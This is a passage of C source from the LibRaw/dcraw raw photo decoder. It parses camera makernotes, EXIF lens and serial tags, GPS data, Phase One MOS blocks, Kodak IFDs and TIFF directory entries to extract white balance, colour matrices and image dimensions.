if (tag == 0x1017 || tag == 0x20400100)
cam_mul[0] = get2() / 256.0;
if (tag == 0x1018 || tag == 0x20400100)
cam_mul[2] = get2() / 256.0;
if (tag == 0x2011 && len == 2) {
get2_256:
order = 0x4d4d;
cam_mul[0] = get2() / 256.0;
cam_mul[2] = get2() / 256.0;
}
if ((tag | 0x70) == 0x2070 && (type == 4 || type == 13))
fseek (ifp, get4()+base, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
if (tag == 0x2010)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, 0x2010);
fseek(ifp,_pos3,SEEK_SET);
}
if (
((tag == 0x2020) || (tag == 0x3000) || (tag == 0x2030) || (tag == 0x2031)) &&
((type == 7) || (type == 13)) &&
!strncasecmp(make,"Olympus",7)
)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, tag);
fseek(ifp,_pos3,SEEK_SET);
}
// IB end
#endif
if ((tag == 0x2020) && ((type == 7) || (type == 13)) && !strncmp(buf,"OLYMP",5))
parse_thumb_note (base, 257, 258);
if (tag == 0x2040)
parse_makernote (base, 0x2040);
if (tag == 0xb028) {
fseek (ifp, get4()+base, SEEK_SET);
parse_thumb_note (base, 136, 137);
}
if (tag == 0x4001 && len > 500 && len < 100000) {
i = len == 582 ? 50 : len == 653 ? 68 : len == 5120 ? 142 : 126;
fseek (ifp, i, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
for (i+=18; i <= len; i+=10) {
get2();
FORC4 sraw_mul[c ^ (c >> 1)] = get2();
if (sraw_mul[1] == 1170) break;
}
}
if(!strncasecmp(make,"Samsung",7))
{
if (tag == 0xa020) // get the full Samsung encryption key
for (i=0; i<11; i++) SamsungKey[i] = get4();
if (tag == 0xa021) // get and decode Samsung cam_mul array
FORC4 cam_mul[c ^ (c >> 1)] = get4() - SamsungKey[c];
#ifdef LIBRAW_LIBRARY_BUILD
if (tag == 0xa023)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] = get4() - SamsungKey[8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = get4() - SamsungKey[9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = get4() - SamsungKey[10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][2] = get4() - SamsungKey[0];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] >> 4;
}
}
if (tag == 0xa024)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][c ^ (c >> 1)] = get4() - SamsungKey[c+1];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] >> 4;
}
}
if (tag == 0xa025)
imgdata.color.linear_max[0]=
imgdata.color.linear_max[1]=
imgdata.color.linear_max[2]=
imgdata.color.linear_max[3]= get4() - SamsungKey[0];
if (tag == 0xa030 && len == 9)
for (i=0; i < 3; i++)
FORC3 imgdata.color.ccm[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
#endif
if (tag == 0xa031 && len == 9) // get and decode Samsung color matrix
for (i=0; i < 3; i++)
FORC3 cmatrix[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
if (tag == 0xa028)
FORC4 cblack[c ^ (c >> 1)] = get4() - SamsungKey[c];
}
else
{
// Somebody else use 0xa021 and 0xa028?
if (tag == 0xa021)
FORC4 cam_mul[c ^ (c >> 1)] = get4();
if (tag == 0xa028)
FORC4 cam_mul[c ^ (c >> 1)] -= get4();
}
if (tag == 0x4021 && get4() && get4())
FORC4 cam_mul[c] = 1024;
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
/*
Since the TIFF DateTime string has no timezone information,
assume that the camera's clock was set to Universal Time.
*/
void CLASS get_timestamp (int reversed)
{
struct tm t;
char str[20];
int i;
str[19] = 0;
if (reversed)
for (i=19; i--; ) str[i] = fgetc(ifp);
else
fread (str, 19, 1, ifp);
memset (&t, 0, sizeof t);
if (sscanf (str, "%d:%d:%d %d:%d:%d", &t.tm_year, &t.tm_mon,
&t.tm_mday, &t.tm_hour, &t.tm_min, &t.tm_sec) != 6)
return;
t.tm_year -= 1900;
t.tm_mon -= 1;
t.tm_isdst = -1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
void CLASS parse_exif (int base)
{
unsigned kodak, entries, tag, type, len, save, c;
double expo,ape;
kodak = !strncmp(make,"EASTMAN",7) && tiff_nifds < 3;
entries = get2();
if(!strncmp(make,"Hasselblad",10) && (tiff_nifds > 3) && (entries > 512)) return;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && savepos + len > fsize*2) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.dng.MinFocal = getreal(type);
imgdata.lens.dng.MaxFocal = getreal(type);
imgdata.lens.dng.MaxAp4MinFocal = getreal(type);
imgdata.lens.dng.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
#endif
case 33434: tiff_ifd[tiff_nifds-1].t_shutter =
shutter = getreal(type); break;
case 33437: aperture = getreal(type); break; // 0x829d FNumber
case 34855: iso_speed = get2(); break;
case 34866:
if (iso_speed == 0xffff && (!strncasecmp(make, "SONY",4) || !strncasecmp(make, "CANON",5)))
iso_speed = getreal(type);
break;
case 36867:
case 36868: get_timestamp(0); break;
case 37377: if ((expo = -getreal(type)) < 128 && shutter == 0.)
tiff_ifd[tiff_nifds-1].t_shutter =
shutter = libraw_powf64(2.0, expo);
break;
case 37378: // 0x9202 ApertureValue
if ((fabs(ape = getreal(type))<256.0) && (!aperture))
aperture = libraw_powf64(2.0, ape/2);
break;
case 37385: flash_used = getreal(type); break;
case 37386: focal_len = getreal(type); break;
case 37500: // tag 0x927c
#ifdef LIBRAW_LIBRARY_BUILD
if (((make[0] == '\0') && (!strncmp(model, "ov5647",6))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_OV5647",9))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_imx219",9)))) {
char mn_text[512];
char *pos;
char ccms[512];
ushort l;
float num;
fgets(mn_text, MIN(len,511), ifp);
mn_text[511] = 0;
pos = strstr(mn_text, "gain_r=");
if (pos)
cam_mul[0] = atof(pos + 7);
pos = strstr(mn_text, "gain_b=");
if (pos)
cam_mul[2] = atof(pos + 7);
if ((cam_mul[0] > 0.001f) && (cam_mul[2] > 0.001f))
cam_mul[1] = cam_mul[3] = 1.0f;
else
cam_mul[0] = cam_mul[2] = 0.0f;
pos = strstr(mn_text, "ccm=");
if(pos)
{
pos +=4;
char *pos2 = strstr(pos, " ");
if(pos2)
{
l = pos2 - pos;
memcpy(ccms, pos, l);
ccms[l] = '\0';
#if defined WIN32 || defined(__MINGW32__)
// Win32 strtok is already thread-safe
pos = strtok(ccms, ",");
#else
char *last=0;
pos = strtok_r(ccms, ",",&last);
#endif
if(pos)
{
for (l = 0; l < 4; l++)
{
num = 0.0;
for (c = 0; c < 3; c++)
{
imgdata.color.ccm[l][c] = (float)atoi(pos);
num += imgdata.color.ccm[l][c];
#if defined WIN32 || defined(__MINGW32__)
pos = strtok(NULL, ",");
#else
pos = strtok_r(NULL, ",",&last);
#endif
if(!pos) goto end; // broken
}
if (num > 0.01)
FORC3 imgdata.color.ccm[l][c] = imgdata.color.ccm[l][c] / num;
}
}
}
}
end:;
}
else
#endif
parse_makernote (base, 0);
break;
case 40962: if (kodak) raw_width = get4(); break;
case 40963: if (kodak) raw_height = get4(); break;
case 41730:
if (get4() == 0x20002)
for (exif_cfa=c=0; c < 8; c+=2)
exif_cfa |= fgetc(ifp) * 0x01010101 << c;
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS parse_gps_libraw(int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
if (entries > 200)
return;
if (entries > 0)
imgdata.other.parsed_gps.gpsparsed = 1;
while (entries--) {
tiff_get(base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: imgdata.other.parsed_gps.latref = getc(ifp); break;
case 3: imgdata.other.parsed_gps.longref = getc(ifp); break;
case 5: imgdata.other.parsed_gps.altref = getc(ifp); break;
case 2:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.latitude[c] = getreal(type);
break;
case 4:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.longtitude[c] = getreal(type);
break;
case 7:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.gpstimestamp[c] = getreal(type);
break;
case 6:
imgdata.other.parsed_gps.altitude = getreal(type);
break;
case 9: imgdata.other.parsed_gps.gpsstatus = getc(ifp); break;
}
fseek(ifp, save, SEEK_SET);
}
}
#endif
void CLASS parse_gps (int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: case 3: case 5:
gpsdata[29+tag/2] = getc(ifp); break;
case 2: case 4: case 7:
FORC(6) gpsdata[tag/3*6+c] = get4(); break;
case 6:
FORC(2) gpsdata[18+c] = get4(); break;
case 18: case 29:
fgets ((char *) (gpsdata+14+tag/3), MIN(len,12), ifp);
}
fseek (ifp, save, SEEK_SET);
}
}
void CLASS romm_coeff (float romm_cam[3][3])
{
static const float rgb_romm[3][3] = /* ROMM == Kodak ProPhoto */
{ { 2.034193, -0.727420, -0.306766 },
{ -0.228811, 1.231729, -0.002922 },
{ -0.008565, -0.153273, 1.161839 } };
int i, j, k;
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
for (cmatrix[i][j] = k=0; k < 3; k++)
cmatrix[i][j] += rgb_romm[i][k] * romm_cam[k][j];
}
void CLASS parse_mos (int offset)
{
char data[40];
int skip, from, i, c, neut[4], planes=0, frot=0;
static const char *mod[] =
{ "","DCB2","Volare","Cantare","CMost","Valeo 6","Valeo 11","Valeo 22",
"Valeo 11p","Valeo 17","","Aptus 17","Aptus 22","Aptus 75","Aptus 65",
"Aptus 54S","Aptus 65S","Aptus 75S","AFi 5","AFi 6","AFi 7",
"AFi-II 7","Aptus-II 7","","Aptus-II 6","","","Aptus-II 10","Aptus-II 5",
"","","","","Aptus-II 10R","Aptus-II 8","","Aptus-II 12","","AFi-II 12" };
float romm_cam[3][3];
fseek (ifp, offset, SEEK_SET);
while (1) {
if (get4() != 0x504b5453) break;
get4();
fread (data, 1, 40, ifp);
skip = get4();
from = ftell(ifp);
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp(data,"CameraObj_camera_type")) {
stmread(imgdata.lens.makernotes.body, skip, ifp);
}
if (!strcmp(data,"back_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.BodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.BodySerial));
strcpy (imgdata.shootinginfo.BodySerial, words[0]);
}
if (!strcmp(data,"CaptProf_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
strcpy (imgdata.shootinginfo.InternalBodySerial, words[0]);
}
#endif
// IB end
if (!strcmp(data,"JPEG_preview_data")) {
thumb_offset = from;
thumb_length = skip;
}
if (!strcmp(data,"icc_camera_profile")) {
profile_offset = from;
profile_length = skip;
}
if (!strcmp(data,"ShootObj_back_type")) {
fscanf (ifp, "%d", &i);
if ((unsigned) i < sizeof mod / sizeof (*mod))
strcpy (model, mod[i]);
}
if (!strcmp(data,"icc_camera_to_tone_matrix")) {
for (i=0; i < 9; i++)
((float *)romm_cam)[i] = int_to_float(get4());
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_color_matrix")) {
for (i=0; i < 9; i++)
fscanf (ifp, "%f", (float *)romm_cam + i);
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_number_of_planes"))
fscanf (ifp, "%d", &planes);
if (!strcmp(data,"CaptProf_raw_data_rotation"))
fscanf (ifp, "%d", &flip);
if (!strcmp(data,"CaptProf_mosaic_pattern"))
FORC4 {
fscanf (ifp, "%d", &i);
if (i == 1) frot = c ^ (c >> 1);
}
if (!strcmp(data,"ImgProf_rotation_angle")) {
fscanf (ifp, "%d", &i);
flip = i - flip;
}
if (!strcmp(data,"NeutObj_neutrals") && !cam_mul[0]) {
FORC4 fscanf (ifp, "%d", neut+c);
FORC3 cam_mul[c] = (float) neut[0] / neut[c+1];
}
if (!strcmp(data,"Rows_data"))
load_flags = get4();
parse_mos (from);
fseek (ifp, skip+from, SEEK_SET);
}
if (planes)
filters = (planes == 1) * 0x01010101 *
(uchar) "\x94\x61\x16\x49"[(flip/90 + frot) & 3];
}
void CLASS linear_table (unsigned len)
{
int i;
if (len > 0x10000) len = 0x10000;
read_shorts (curve, len);
for (i=len; i < 0x10000; i++)
curve[i] = curve[i-1];
maximum = curve[len<0x1000?0xfff:len-1];
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS Kodak_WB_0x08tags (int wb, unsigned type)
{
float mul[3]={1,1,1}, num, mul2;
int c;
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
imgdata.color.WB_Coeffs[wb][1] = imgdata.color.WB_Coeffs[wb][3] = mul[1];
mul2 = mul[1] * mul[1];
imgdata.color.WB_Coeffs[wb][0] = mul2 / mul[0];
imgdata.color.WB_Coeffs[wb][2] = mul2 / mul[2];
return;
}
/* Thanks to Alexey Danilchenko for wb as-shot parsing code */
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
INT64 fsize = ifp->size();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > 2*fsize) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag | 0x20000,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
if (tag == 1011) imgdata.other.FlashEC = getreal(type);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0f,get2());
wbi = -2;
}
if (tag == 0x0848) Kodak_WB_0x08tags(LIBRAW_WBI_Daylight, type);
if (tag == 0x0849) Kodak_WB_0x08tags(LIBRAW_WBI_Tungsten, type);
if (tag == 0x084a) Kodak_WB_0x08tags(LIBRAW_WBI_Fluorescent, type);
if (tag == 0x084b) Kodak_WB_0x08tags(LIBRAW_WBI_Flash, type);
if (tag == 0x0e93) imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = get2();
if (tag == 0x09ce)
stmread(imgdata.shootinginfo.InternalBodySerial,len, ifp);
if (tag == 0xfa00)
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if (tag == 0xfa27)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
}
if (tag == 0xfa28)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
}
if (tag == 0xfa29)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
}
if (tag == 0xfa2a)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
}
if (tag == 2120 + wbi ||
(wbi<0 && tag == 2125)) /* use Auto WB if illuminant index is not set */
{
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
FORC3 cam_mul[c] = mul[1] / mul[c]; /* normalise against green */
}
if (tag == 2317) linear_table (len);
if (tag == 0x903) iso_speed = getreal(type);
//if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#else
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2, wbtemp=6500;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,get2());
wbi = -2;
}
if (tag == 2118) wbtemp = getint(type);
if (tag == 2120 + wbi && wbi >= 0)
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,getreal(type));
if (tag == 2130 + wbi)
FORC3 mul[c] = getreal(type);
if (tag == 2140 + wbi && wbi >= 0)
FORC3 {
for (num=i=0; i < 4; i++)
num += getreal(type) * pow (wbtemp/100.0, i);
cam_mul[c] = 2048 / fMAX(1.0,(num * mul[c]));
}
if (tag == 2317) linear_table (len);
if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#endif
//@end COMMON
void CLASS parse_minolta (int base);
int CLASS parse_tiff (int base);
//@out COMMON
int CLASS parse_tiff_ifd (int base)
{
unsigned entries, tag, type, len, plen=16, save;
int ifd, use_cm=0, cfa, i, j, c, ima_len=0;
char *cbuf, *cp;
uchar cfa_pat[16], cfa_pc[] = { 0,1,2,3 }, tab[256];
double fm[3][4], cc[4][4], cm[4][3], cam_xyz[4][3], num;
double ab[]={ 1,1,1,1 }, asn[] = { 0,0,0,0 }, xyz[] = { 1,1,1 };
unsigned sony_curve[] = { 0,0,0,0,0,4095 };
unsigned *buf, sony_offset=0, sony_length=0, sony_key=0;
struct jhead jh;
int pana_raw = 0;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *sfp;
#endif
if (tiff_nifds >= sizeof tiff_ifd / sizeof tiff_ifd[0])
return 1;
ifd = tiff_nifds++;
for (j=0; j < 4; j++)
for (i=0; i < 4; i++)
cc[j][i] = i == j;
entries = get2();
if (entries > 512) return 1;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > fsize*2) continue; // skip tag pointing out of 2xfile
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag|(pana_raw?0x30000:0),type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncasecmp(make, "SONY", 4) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "HV",2))))
{
switch (tag) {
case 0x7300: // SR2 black level
for (int i = 0; i < 4 && i < len; i++)
cblack[i] = get2();
break;
case 0x7480:
case 0x7820:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
break;
case 0x7481:
case 0x7821:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1];
break;
case 0x7482:
case 0x7822:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
break;
case 0x7483:
case 0x7823:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1];
break;
case 0x7484:
case 0x7824:
imgdata.color.WBCT_Coeffs[0][0] = 4500;
FORC3 imgdata.color.WBCT_Coeffs[0][c+1] = get2();
imgdata.color.WBCT_Coeffs[0][4] = imgdata.color.WBCT_Coeffs[0][2];
break;
case 0x7486:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
break;
case 0x7825:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
break;
case 0x7826:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1];
break;
case 0x7827:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1];
break;
case 0x7828:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1];
break;
case 0x7829:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1];
break;
case 0x782a:
imgdata.color.WBCT_Coeffs[1][0] = 8500;
FORC3 imgdata.color.WBCT_Coeffs[1][c+1] = get2();
imgdata.color.WBCT_Coeffs[1][4] = imgdata.color.WBCT_Coeffs[1][2];
break;
case 0x782b:
imgdata.color.WBCT_Coeffs[2][0] = 6000;
FORC3 imgdata.color.WBCT_Coeffs[2][c+1] = get2();
imgdata.color.WBCT_Coeffs[2][4] = imgdata.color.WBCT_Coeffs[2][2];
break;
case 0x782c:
imgdata.color.WBCT_Coeffs[3][0] = 3200;
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][c] = imgdata.color.WBCT_Coeffs[3][c+1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][3] = imgdata.color.WBCT_Coeffs[3][4] = imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][1];
break;
case 0x782d:
imgdata.color.WBCT_Coeffs[4][0] = 2500;
FORC3 imgdata.color.WBCT_Coeffs[4][c+1] = get2();
imgdata.color.WBCT_Coeffs[4][4] = imgdata.color.WBCT_Coeffs[4][2];
break;
case 0x787f:
FORC3 imgdata.color.linear_max[c] = get2();
imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
break;
}
}
#endif
switch (tag) {
case 1: if(len==4) pana_raw = get4(); break;
case 5: width = get2(); break;
case 6: height = get2(); break;
case 7: width += get2(); break;
case 9: if ((i = get2())) filters = i;
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=i;
#endif
break;
case 8:
case 10:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=get2();
#endif
break;
case 14: case 15: case 16:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
imgdata.color.linear_max[tag-14] = get2();
if (tag == 15 ) imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
}
#endif
break;
case 17: case 18:
if (type == 3 && len == 1)
cam_mul[(tag-17)*2] = get2() / 256.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 19:
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = 0x100;
} else get4();
}
}
break;
#endif
case 23:
if (type == 3) iso_speed = get2();
break;
case 28: case 29: case 30:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
{
pana_black[tag-28] = get2();
}
else
#endif
{
cblack[tag-28] = get2();
cblack[3] = cblack[1];
}
break;
case 36: case 37: case 38:
cam_mul[tag-36] = get2();
break;
case 39:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
} else fseek(ifp, 6, SEEK_CUR);
}
}
break;
#endif
if (len < 50 || cam_mul[0]) break;
fseek (ifp, 12, SEEK_CUR);
FORC3 cam_mul[c] = get2();
break;
case 46:
if (type != 7 || fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) break;
thumb_offset = ftell(ifp) - 2;
thumb_length = len;
break;
case 61440: /* Fuji HS10 table */
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
case 2: case 256: case 61441: /* ImageWidth */
tiff_ifd[ifd].t_width = getint(type);
break;
case 3: case 257: case 61442: /* ImageHeight */
tiff_ifd[ifd].t_height = getint(type);
break;
case 258: /* BitsPerSample */
case 61443:
tiff_ifd[ifd].samples = len & 7;
tiff_ifd[ifd].bps = getint(type);
if (tiff_bps < tiff_ifd[ifd].bps)
tiff_bps = tiff_ifd[ifd].bps;
break;
case 61446:
raw_height = 0;
if (tiff_ifd[ifd].bps > 12) break;
load_raw = &CLASS packed_load_raw;
load_flags = get4() ? 24:80;
break;
case 259: /* Compression */
tiff_ifd[ifd].comp = getint(type);
break;
case 262: /* PhotometricInterpretation */
tiff_ifd[ifd].phint = get2();
break;
case 270: /* ImageDescription */
fread (desc, 512, 1, ifp);
break;
case 271: /* Make */
fgets (make, 64, ifp);
break;
case 272: /* Model */
fgets (model, 64, ifp);
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 278:
tiff_ifd[ifd].rows_per_strip = getint(type);
break;
#endif
